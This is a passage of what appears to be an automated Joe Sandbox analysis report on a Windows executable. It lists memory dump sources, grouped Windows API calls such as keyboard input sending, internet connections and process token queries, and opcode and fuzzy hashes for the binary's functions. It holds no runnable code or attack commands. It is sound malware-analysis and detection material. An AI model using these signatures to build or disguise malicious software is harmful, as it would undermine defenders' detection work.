                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectory$AttributesErrorFileLast
                                                            • String ID:
                                                            • API String ID: 2267087916-0
                                                            • Opcode ID: 885fddea0d2d34b219ca6ab898c8b75d575591909594024e161a1fcc4b4d8134
                                                            • Instruction ID: 3dff5f9be03f3bebbd22cc176a57c0cfff67bd176c940eca84b64f33df6c0104
                                                            • Opcode Fuzzy Hash: 885fddea0d2d34b219ca6ab898c8b75d575591909594024e161a1fcc4b4d8134
                                                            • Instruction Fuzzy Hash: 8051AF22B05A91C5EF50EF66EA845ECA3B5BB44B94B988135DE0D53B98DF3CD942C320
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                            • String ID:
                                                            • API String ID: 3321077145-0
                                                            • Opcode ID: f222de675bb5cfeccc39e8564db9bf58fcd79be7e0b29fca596ca30ba57e565e
                                                            • Instruction ID: a0ac7fcfa0ddd3dcb536bee46dd08c4ff935e7f658fc554a7eb2868965d050c9
                                                            • Opcode Fuzzy Hash: f222de675bb5cfeccc39e8564db9bf58fcd79be7e0b29fca596ca30ba57e565e
                                                            • Instruction Fuzzy Hash: CD41D666A04B8681DF14EF26E4940ADB7A0FB88FD0B8D9432DF4E47766DF38E4408360
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                            • String ID:
                                                            • API String ID: 1352109105-0
                                                            • Opcode ID: 2f09a68d55c04cb191ca289c596e56cd55ceee8682779a4dba9d7602fe5484e5
                                                            • Instruction ID: 5914e77253d1d2553c0e71dc5b8ec925f39ae64f359afd491f6f666a7c8d6d49
                                                            • Opcode Fuzzy Hash: 2f09a68d55c04cb191ca289c596e56cd55ceee8682779a4dba9d7602fe5484e5
                                                            • Instruction Fuzzy Hash: EF414576A09A8A86EF50EF55E8846B9BBA4FB44B54F994135CF5D433A0DF38E4418320
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$DrawInfoInsert
                                                            • String ID:
                                                            • API String ID: 3076010158-0
                                                            • Opcode ID: 770ae648199355dfd02d8249b0e6024aefb4e9674bbaddc28923590af2170785
                                                            • Instruction ID: 7fd854829bd837fb859183636f5d114b4e5bd8db0e366e1b7961ce4961d52bc8
                                                            • Opcode Fuzzy Hash: 770ae648199355dfd02d8249b0e6024aefb4e9674bbaddc28923590af2170785
                                                            • Instruction Fuzzy Hash: FA414A36B04A858AEB54DF66E4802EDBBA1FB44B98F99403ACF0D53754CF38E855C760
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                            • String ID:
                                                            • API String ID: 4141327611-0
                                                            • Opcode ID: a9867840faaecfdaa354c38ff02ada8b7424d64697801e09ff4ff5a4409c6d4e
                                                            • Instruction ID: 5ed70a04ea4367e74809f5df0095653afe194c6e41d518cec3880eec34cfb371
                                                            • Opcode Fuzzy Hash: a9867840faaecfdaa354c38ff02ada8b7424d64697801e09ff4ff5a4409c6d4e
                                                            • Instruction Fuzzy Hash: 83417F22A0A7C246FF61BB11F1443F9E691AF80B94F9C8135DA4D06A95DF2CDC828B21
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: KeyboardState$InputMessagePostSend
                                                            • String ID:
                                                            • API String ID: 432972143-0
                                                            • Opcode ID: 56c9a0b6ee225f986b8f36bfa830b7f851ce703ec5b55e2ab927aaea8bed82d2
                                                            • Instruction ID: 972a72b0e5be74b9281f9e114914c68762eace9bbc8a333a40fc3f1d77a449ca
                                                            • Opcode Fuzzy Hash: 56c9a0b6ee225f986b8f36bfa830b7f851ce703ec5b55e2ab927aaea8bed82d2
                                                            • Instruction Fuzzy Hash: 2641EAA1A0D6C2C1FF30AB25B4546FAA6A0E744FA0F981531D69E136D5CF3CD8838720
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: KeyboardState$InputMessagePostSend
                                                            • String ID:
                                                            • API String ID: 432972143-0
                                                            • Opcode ID: 5e46c45bdab3a47586a9f1d6f3cf12586a4e74534b52d5ecd50e7167bd5190cf
                                                            • Instruction ID: 3ac13be8e9a562392654ddf964c2e03270571f4226e906aba12e7fbc29e6c991
                                                            • Opcode Fuzzy Hash: 5e46c45bdab3a47586a9f1d6f3cf12586a4e74534b52d5ecd50e7167bd5190cf
                                                            • Instruction Fuzzy Hash: 8031C721A086C185EF70AB25B4007FAABA4EB54F64F9D0132DA9D03795CF3CD956C720
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Internet$CloseConnectHandleOpen
                                                            • String ID:
                                                            • API String ID: 1463438336-0
                                                            • Opcode ID: 9c6a6dce98b363ecdfbcced4837c14e9bd6a16cec9fa7559d6c8d26d8fbc25c1
                                                            • Instruction ID: 748ff6b55efa25950c5158c4be47a193e4eb4621779e14f16de15d2b64f2ca79
                                                            • Opcode Fuzzy Hash: 9c6a6dce98b363ecdfbcced4837c14e9bd6a16cec9fa7559d6c8d26d8fbc25c1
                                                            • Instruction Fuzzy Hash: 0D316C36A0878282EB24AF16F4517BDB7A1FB49BD4F884135DA5D07B48DF2CE0558B60
                                                            APIs
                                                            • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF75F17A27B,?,?,?,00007FF75F17A236), ref: 00007FF75F183DB1
                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF75F17A27B,?,?,?,00007FF75F17A236), ref: 00007FF75F183E13
                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF75F17A27B,?,?,?,00007FF75F17A236), ref: 00007FF75F183E4D
                                                            • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF75F17A27B,?,?,?,00007FF75F17A236), ref: 00007FF75F183E77
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                            • String ID:
                                                            • API String ID: 1557788787-0
                                                            • Opcode ID: 25a861fe2411cd7b7e0da0a01173a2db480df9a66baf5c5800189b1476d27112
                                                            • Instruction ID: f2df7065369c12f8e192dfb0160ee1eefba7cc674354a61a982bbe36a9d82067
                                                            • Opcode Fuzzy Hash: 25a861fe2411cd7b7e0da0a01173a2db480df9a66baf5c5800189b1476d27112
                                                            • Instruction Fuzzy Hash: B1216121B587D181EA20AF167540069F6A5FB54FD0F8C4234DE9E63BD4DF3CE4529711
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Window$Long
                                                            • String ID:
                                                            • API String ID: 847901565-0
                                                            • Opcode ID: 17af9f186f091bf577d3b0a8bd6a034cb4dd905415e59c2f23c9277c7aa4b264
                                                            • Instruction ID: 4a2352fa214b6f0cfba7547b0e20ca327d05f1ed1d89dc594f26226bdf84c4ad
                                                            • Opcode Fuzzy Hash: 17af9f186f091bf577d3b0a8bd6a034cb4dd905415e59c2f23c9277c7aa4b264
                                                            • Instruction Fuzzy Hash: D921B861A08B8546EE10AB65A894379BB90EF85BA4F9D4335EE6D477D4CF3CE441C320
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                            • String ID:
                                                            • API String ID: 2864067406-0
                                                            • Opcode ID: b766ee5e7a6f79c275b6e8452a41ed66ab3f515ad85ef8642b06b7120701f994
                                                            • Instruction ID: 2a4898c1ce74c966efce7ef7416fcadda7e29f64025bee172a32f44ed2e2b174
                                                            • Opcode Fuzzy Hash: b766ee5e7a6f79c275b6e8452a41ed66ab3f515ad85ef8642b06b7120701f994
                                                            • Instruction Fuzzy Hash: EE313E26A08A8585EF10EB15F4943F9A760FB84B94F984131DA4D47BA8DF3CD596C720
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: lstrcmpilstrcpylstrlen
                                                            • String ID: cdecl
                                                            • API String ID: 4031866154-3896280584
                                                            • Opcode ID: 9543eb87236cbe86fa524af2d72e3452b2187adb33a089d16778c3ede46c2dfa
                                                            • Instruction ID: b62a9ed01d5d13c1b9305795e980df3b1f49cdb3a77e9ee12a1261655bc602dd
                                                            • Opcode Fuzzy Hash: 9543eb87236cbe86fa524af2d72e3452b2187adb33a089d16778c3ede46c2dfa
                                                            • Instruction Fuzzy Hash: B721AD21604382C6EF20AF16A8502B8B3A1EF98F90B894134EB5E87798DF3CE8518314
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Heap$InformationProcessToken$AllocCopyErrorFreeLastLength
                                                            • String ID:
                                                            • API String ID: 837644225-0
                                                            • Opcode ID: 9a34ca7cdec84128c61d79319dba9bc3ccc379250e2fae1bd0d7ccebff0f194a
                                                            • Instruction ID: 7d2eb09fb20e609c56373a701ed24a916c4be75dbae4a95ce871c4a76cd477be
                                                            • Opcode Fuzzy Hash: 9a34ca7cdec84128c61d79319dba9bc3ccc379250e2fae1bd0d7ccebff0f194a
                                                            • Instruction Fuzzy Hash: EC21DE72A19B8186EF04EF61E8447A8B3A5FB44BD5F894139CA4D43748DF3DE842C760
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: CreateMessageObjectSendStockWindow
                                                            • String ID:
                                                            • API String ID: 3970641297-0
                                                            • Opcode ID: dfdf152a6b4170b9c012631cbf21b5eef6d1f67974f7a0a9349fa7dc94decf0b
                                                            • Instruction ID: 11707903eb36734e955d0c8c15d7967d08cb21c69e770273a37c631052039911
                                                            • Opcode Fuzzy Hash: dfdf152a6b4170b9c012631cbf21b5eef6d1f67974f7a0a9349fa7dc94decf0b
                                                            • Instruction Fuzzy Hash: D2215172A087C586EB649B25F4947AAB7A1FB89784F880135DB8D43B58DF3CD484CB10
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 2979156933-0
                                                            • Opcode ID: 2a49c66315dd4afd268b707153c3627d2a79b8a5ce35e179a418e828e304454b
                                                            • Instruction ID: 9c98f882da8469d1e410c7d4d4688413e2e7f28e759a5e47eb3e30949cef50d9
                                                            • Opcode Fuzzy Hash: 2a49c66315dd4afd268b707153c3627d2a79b8a5ce35e179a418e828e304454b
                                                            • Instruction Fuzzy Hash: 13210B72A087C586EB10EF16B8401AAF791FB44BD4F884135EA9D43B55CF3CD5068761
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: _ctrlfp
                                                            • String ID:
                                                            • API String ID: 697997973-0
                                                            • Opcode ID: 696024c0d85e9950b44dad3db47e8c6049c7f355de1dae667ed974782f5b2eb5
                                                            • Instruction ID: b8924d95a30255123ff5f4a80f2de4137b9be51cb81afd025b114d180fbdd52e
                                                            • Opcode Fuzzy Hash: 696024c0d85e9950b44dad3db47e8c6049c7f355de1dae667ed974782f5b2eb5
                                                            • Instruction Fuzzy Hash: DF11C921D4D9C581DA11AA38B1411FBD271FF9A780FA84235FB8D46695DF2EF8418A50
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                            • String ID:
                                                            • API String ID: 357397906-0
                                                            • Opcode ID: 30ca773a2ae41b56c6e1d6d31e0bfc9c1d6a93403dc69e79101ac1cf7de44ee4
                                                            • Instruction ID: 4f316f370dce4081f45957084badc0af0740c03df9936622bba7e1dc33721738
                                                            • Opcode Fuzzy Hash: 30ca773a2ae41b56c6e1d6d31e0bfc9c1d6a93403dc69e79101ac1cf7de44ee4
                                                            • Instruction Fuzzy Hash: AF21C5B6A04781DFEB00DF74E89459C7BB0F748B88B444826EB5893B18DB78D655CB50
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Type$Register$FileLoadModuleNameUser
                                                            • String ID:
                                                            • API String ID: 1352324309-0
                                                            • Opcode ID: 26dceef0b12b748e4890be4283cc75c768f711def0b64c07a5df3002dea28784
                                                            • Instruction ID: 1b630b8cef7fa98999540fa2ddda0f73d0ef78a13d622bf3e9cc9b924586fe66
                                                            • Opcode Fuzzy Hash: 26dceef0b12b748e4890be4283cc75c768f711def0b64c07a5df3002dea28784
                                                            • Instruction Fuzzy Hash: A9117772718582C2EF209F25F5843A9A7A0FB88B48FD98135C74D8B644CF7CD955CB60
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$abort
                                                            • String ID:
                                                            • API String ID: 1447195878-0
                                                            • Opcode ID: 0faf83f130fa22d125fe7e1bf2297fae296eca513ac77b66c62e822180671c32
                                                            • Instruction ID: e983323272489535f95b91cf1372bf2df2d352b4599ecf9f956a917a327e9e57
                                                            • Opcode Fuzzy Hash: 0faf83f130fa22d125fe7e1bf2297fae296eca513ac77b66c62e822180671c32
                                                            • Instruction Fuzzy Hash: BF011720A0E2C242EE58F775B6555F891515F447A4FDC1538D91E06BEBDF2CAC414630
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: CounterPerformanceQuerySleep
                                                            • String ID:
